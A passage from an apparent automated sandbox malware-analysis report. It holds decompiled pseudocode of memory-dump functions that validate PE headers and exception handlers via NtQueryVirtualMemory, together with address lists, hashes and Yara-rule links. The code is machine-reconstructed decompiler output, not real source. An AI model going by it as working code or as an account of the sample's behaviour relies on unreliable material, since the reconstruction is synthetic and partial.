									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x3841c0 = 1;
										__eflags =  *0x3841c0;
										if( *0x3841c0 != 0) {
											goto L60;
										}
										_t84 =  *0x384178;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x3841c0 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x384178 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x384180 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x38417c + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x384180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x384180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x3841c0 = 1;
							__eflags =  *0x3841c0;
							if( *0x3841c0 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x384180 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x384180 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x3841c0 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x384180 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x384178 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x384180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x384180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x003822ef
0x003822f2
0x003822f8
0x00382316
0x00000000
0x00382316
0x00382300
0x00382309
0x0038230f
0x0038231e
0x00382321
0x00382324
0x0038232e
0x0038232e
0x00382330
0x00382333
0x00382335
0x00382335
0x00382337
0x0038233a
0x00000000
0x00000000
0x0038233c
0x0038233e
0x003823a4
0x003823a4
0x00382502
0x00000000
0x00382502
0x00382340
0x00382340
0x00382344
0x00382346
0x00382346
0x00382346
0x00382346
0x00382349
0x0038234a
0x0038234d
0x0038234d
0x00382351
0x00382355
0x00382363
0x00382363
0x0038236b
0x00382371
0x00382373
0x00382375
0x00382385
0x00382392
0x00382396
0x0038239b
0x0038239d
0x0038241b
0x0038241b
0x0038239f
0x0038239f
0x0038239f
0x0038241d
0x0038241f
0x00382500
0x00382500
0x00000000
0x00382425
0x00382425
0x0038242c
0x00000000
0x00000000
0x00382432
0x00382436
0x00382492
0x00382494
0x0038249c
0x0038249e
0x003824a0
0x00000000
0x00000000
0x003824a2
0x003824a8
0x003824aa
0x003824ac
0x003824c1
0x003824c1
0x003824c3
0x003824f2
0x003824f9
0x00000000
0x003824f9
0x003824c7
0x003824c8
0x003824ca
0x003824cc
0x003824cc
0x003824ce
0x003824d0
0x003824d2
0x003824e6
0x003824e6
0x003824e9
0x003824eb
0x003824eb
0x003824ec
0x003824ec
0x00000000
0x003824d4
0x003824d4
0x003824d4
0x003824dd
0x003824de
0x003824e0
0x003824e2
0x003824e2
0x00000000
0x003824d4
0x003824d2
0x003824ae
0x003824b5
0x003824b5
0x003824b7
0x00000000
0x00000000
0x003824b9
0x003824ba
0x003824bd
0x003824bf
0x00000000
0x00000000
0x00000000
0x003824bf
0x00000000
0x003824b5
0x00382438
0x0038243b
0x00382440
0x00000000
0x00000000
0x00382449
0x0038244b
0x00382451
0x00000000
0x00000000
0x00382457
0x0038245d
0x00000000
0x00000000
0x00382463
0x00382465
0x0038246e
0x00382472
0x00000000
0x00000000
0x00382478
0x0038247b
0x0038247d
0x00000000
0x00000000
0x00382484
0x00382486
0x00000000
0x00000000
0x00382488
0x0038248c
0x00000000
0x00000000
0x00000000
0x0038248c
0x00000000
0x00000000
0x00000000
0x00382377
0x00382377
0x00382377
0x0038237e
0x00000000
0x00000000
0x00382380
0x00382381
0x00382383
0x00000000
0x00000000
0x00000000
0x00382383
0x003823ab
0x003823ad
0x00000000
0x00000000
0x003823bd
0x003823bf
0x003823c1
0x00000000
0x00000000
0x003823c7
0x003823ce
0x003823fa
0x003823fa
0x003823fc
0x003823fe
0x00382412
0x00382414
0x00000000
0x00000000
0x00000000
0x00000000
0x00382400
0x00382400
0x00382400
0x00382409
0x0038240a
0x0038240c
0x0038240e
0x0038240e
0x00000000
0x00382400
0x003823d0
0x003823d3
0x003823d5
0x003823e7
0x003823e7
0x003823ea
0x003823ec
0x003823ec
0x003823ed
0x003823ed
0x003823f3
0x00000000
0x00000000
0x00000000
0x00000000
0x003823d7
0x003823d7
0x003823d7
0x003823de
0x00000000
0x00000000
0x003823e0
0x003823e0
0x003823e1
0x00000000
0x00000000
0x00000000
0x003823e1
0x003823e3
0x003823e5
0x003823f8
0x00000000
0x00000000
0x00000000
0x003823f8
0x00000000
0x003823e5
0x00382357
0x0038235a
0x0038235d
0x00000000
0x00000000
0x0038235f
0x00382361
0x00000000
0x00000000
0x00000000
0x00382361
0x00382326
0x00382328
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00382396

Memory Dump Source

Source File: 00000001.00000002.1026915987.0000000000380000.00000040.00020000.sdmp, Offset: 00380000, based on PE: true

Associated: 00000001.00000002.1026960065.0000000000385000.00000040.00020000.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: a7da1e4e36b309caafa3c482bb1c5286174f5e0b96dcf5bd521852eb7ab3d8ee
Instruction ID: fa9a8503246ecb49d618a11dfc8d52bc911751bd8792790405c57dcb455e7ad1
Opcode Fuzzy Hash: a7da1e4e36b309caafa3c482bb1c5286174f5e0b96dcf5bd521852eb7ab3d8ee
Instruction Fuzzy Hash: 2E61D2346007069FDB2BEF29D8A462B73E9EB95314F2684F9D806CB690E774DD81C760

Uniqueness

Uniqueness Score: -1.00%

Function 00BAB2C1, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00BAB2C1(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0xbad2d8; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0xbad320 = 1;
										__eflags =  *0xbad320;
										if( *0xbad320 != 0) {
											goto L60;
										}
										_t84 =  *0xbad2d8; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0xbad320 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0xbad2d8 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0xbad2e0 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0xbad2dc + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0xbad2e0 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0xbad2e0 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0xbad320 = 1;
							__eflags =  *0xbad320;
							if( *0xbad320 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0xbad2e0 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0xbad2e0 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0xbad320 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0xbad2e0 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0xbad2d8 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0xbad2e0 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0xbad2e0 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x00bab2cb
0x00bab2ce
0x00bab2d4
0x00bab2f2
0x00000000
0x00bab2f2
0x00bab2dc
0x00bab2e5
0x00bab2eb
0x00bab2fa
0x00bab2fd
0x00bab300
0x00bab30a
0x00bab30a
0x00bab30c
0x00bab30f
0x00bab311
0x00bab311
0x00bab313
0x00bab316
0x00000000
0x00000000
0x00bab318
0x00bab31a
0x00bab380
0x00bab380
0x00bab4de
0x00000000
0x00bab4de
0x00bab31c
0x00bab31c
0x00bab320
0x00bab322
0x00bab322
0x00bab322
0x00bab322
0x00bab325
0x00bab326
0x00bab329
0x00bab329
0x00bab32d
0x00bab331
0x00bab33f
0x00bab33f
0x00bab347
0x00bab34d
0x00bab34f
0x00bab351
0x00bab361
0x00bab36e
0x00bab372
0x00bab377
0x00bab379
0x00bab3f7
0x00bab3f7
0x00bab37b
0x00bab37b
0x00bab37b
0x00bab3f9
0x00bab3fb
0x00bab4dc
0x00bab4dc
0x00000000
0x00bab401
0x00bab401
0x00bab408
0x00000000
0x00000000
0x00bab40e
0x00bab412
0x00bab46e
0x00bab470
0x00bab478
0x00bab47a
0x00bab47c
0x00000000
0x00000000
0x00bab47e
0x00bab484
0x00bab486
0x00bab488
0x00bab49d
0x00bab49d
0x00bab49f
0x00bab4ce
0x00bab4d5
0x00000000
0x00bab4d5
0x00bab4a3
0x00bab4a4
0x00bab4a6
0x00bab4a8
0x00bab4a8
0x00bab4aa
0x00bab4ac
0x00bab4ae
0x00bab4c2
0x00bab4c2
0x00bab4c5
0x00bab4c7
0x00bab4c7
0x00bab4c8
0x00bab4c8
0x00000000
0x00bab4b0
0x00bab4b0
0x00bab4b0
0x00bab4b9
0x00bab4ba
0x00bab4bc
0x00bab4be
0x00bab4be
0x00000000
0x00bab4b0
0x00bab4ae
0x00bab48a
0x00bab491
0x00bab491
0x00bab493
0x00000000
0x00000000
0x00bab495
0x00bab496
0x00bab499
0x00bab49b
0x00000000
0x00000000
0x00000000
0x00bab49b
0x00000000
0x00bab491
0x00bab414
0x00bab417
0x00bab41c
0x00000000
0x00000000
0x00bab425
0x00bab427
0x00bab42d
0x00000000
0x00000000
0x00bab433
0x00bab439
0x00000000
0x00000000
0x00bab43f
0x00bab441
0x00bab44a
0x00bab44e
0x00000000
0x00000000
0x00bab454
0x00bab457
0x00bab459
0x00000000
0x00000000
0x00bab460
0x00bab462
0x00000000
0x00000000
0x00bab464
0x00bab468
0x00000000
0x00000000
0x00000000
0x00bab468
0x00000000
0x00000000
0x00000000
0x00bab353
0x00bab353
0x00bab353
0x00bab35a
0x00000000
0x00000000
0x00bab35c
0x00bab35d
0x00bab35f
0x00000000
0x00000000
0x00000000
0x00bab35f
0x00bab387
0x00bab389
0x00000000
0x00000000
0x00bab399
0x00bab39b
0x00bab39d
0x00000000
0x00000000
0x00bab3a3
0x00bab3aa
0x00bab3d6
0x00bab3d6
0x00bab3d8
0x00bab3da
0x00bab3ee
0x00bab3f0
0x00000000
0x00000000
0x00000000
0x00000000
0x00bab3dc
0x00bab3dc
0x00bab3dc
0x00bab3e5
0x00bab3e6
0x00bab3e8
0x00bab3ea
0x00bab3ea
0x00000000
0x00bab3dc
0x00bab3ac
0x00bab3ac
0x00bab3af
0x00bab3b1
0x00bab3c3
0x00bab3c3
0x00bab3c6
0x00bab3c8
0x00bab3c8
0x00bab3c9
0x00bab3c9
0x00bab3cf
0x00bab3cf
0x00000000
0x00000000
0x00000000
0x00000000
0x00bab3b3
0x00bab3b3
0x00bab3b3
0x00bab3ba
0x00000000
0x00000000
0x00bab3bc
0x00bab3bc
0x00bab3bd
0x00000000
0x00000000
0x00000000
0x00bab3bd
0x00bab3bf
0x00bab3c1
0x00bab3d4
0x00000000
0x00000000
0x00000000
0x00bab3d4
0x00000000
0x00bab3c1
0x00bab333
0x00bab336
0x00bab339
0x00000000
0x00000000
0x00bab33b
0x00bab33d
0x00000000
0x00000000
0x00000000
0x00bab33d
0x00bab302
0x00bab304
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00BAB372

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: f8f18f3c035d577062a24e146b4a195cbe29567337b0f7b489017ef74091429f
Instruction ID: e6d100629b7fa1e58c6e82d0f39d0371dfd54cd52b167c43d89df3a56c6c4634
Opcode Fuzzy Hash: f8f18f3c035d577062a24e146b4a195cbe29567337b0f7b489017ef74091429f
Instruction Fuzzy Hash: 9761BE316086069FDF29CE29C891F6977E1EB8B314F2485E9D866C7693EB30DC46C748

Uniqueness

Uniqueness Score: -1.00%

Function 00BAEC48, Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69969da3e5f25e517399d62b05eaa08ebb0370a71e65700aaeab7bf355088135
Instruction ID: af4791f24fcd4114945f24c2fc2faf53f45514f389e2fb3cf3a85818bf9a2b45
Opcode Fuzzy Hash: 69969da3e5f25e517399d62b05eaa08ebb0370a71e65700aaeab7bf355088135
Instruction Fuzzy Hash: 26410476915292CFC71A8F78C8DA299FBB2FF0631135946DDC0D29F126C7326046CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00BAEC41, Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2c6ec9702789d8c300688549ffa4c1610bc1884ebbce0ad54c1bc9b0827d967
Instruction ID: 00989da9090c9766abe3220448dca6b38006ebb4b35bb0086e0826b8c382f55a
Opcode Fuzzy Hash: d2c6ec9702789d8c300688549ffa4c1610bc1884ebbce0ad54c1bc9b0827d967
Instruction Fuzzy Hash: 80411376919291CFC71ACF78C8DA695FBB2FF0231035946DDC0D2AF166C322A046CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 003820C4, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E003820C4(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E0038222B(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E003822E5(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E003821D0(_t55, _t66);
										_t89 = _t66 + 0x10;
										E0038222B(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E003822C7(_t82[2], 1);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])();
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x003820c8
0x003820c9
0x003820ca
0x003820cd
0x003820cf
0x003820d2
0x003820d3
0x003820d5
0x003820d6
0x003820d7
0x003820da
0x003820e4
0x00382195
0x0038219c
0x003821a5
0x003820ea
0x003820ea
0x003820f0
0x003820f6
0x003820f9
0x003820fc
0x00382100
0x00382105
0x0038210a
0x0038218a
0x00000000
0x0038210c
0x0038210c
0x00382118
0x0038211a
0x00382175
0x00382175
0x0038217b
0x00000000
0x0038211c
0x0038212b
0x0038212d
0x0038212e
0x0038212f
0x00382132
0x00382132
0x00382134
0x00000000
0x00382136
0x00382136
0x00382180
0x00382138
0x00382138
0x0038213c
0x00382144
0x00382149
0x0038214e
0x0038215a
0x00382162
0x00382169
0x0038216f
0x00382173
0x00000000
0x00382173
0x00382136
0x00382134
0x00000000
0x0038211a
0x0038218e
0x0038218e
0x0038218e
0x0038210a
0x003821aa
0x003821b1

Memory Dump Source

Source File: 00000001.00000002.1026915987.0000000000380000.00000040.00020000.sdmp, Offset: 00380000, based on PE: true

Associated: 00000001.00000002.1026960065.0000000000385000.00000040.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: 2d20862ca3bf17a377fdc5e4d74009279e4b51ae6252a6750790e4799a112e2d
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: 3E219272900304ABCB15EF68C8C49A7BBA5FF49350B4685A8ED159B246D730F915CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00BAB09C, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E00BAB09C(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E00BAB207(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E00BAB2C1(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E00BAB1AC(_t55, _t66);
										_t89 = _t66 + 0x10;
										E00BAB207(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E00BAB2A3(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x00bab0a0
0x00bab0a1
0x00bab0a2
0x00bab0a5
0x00bab0a7
0x00bab0aa
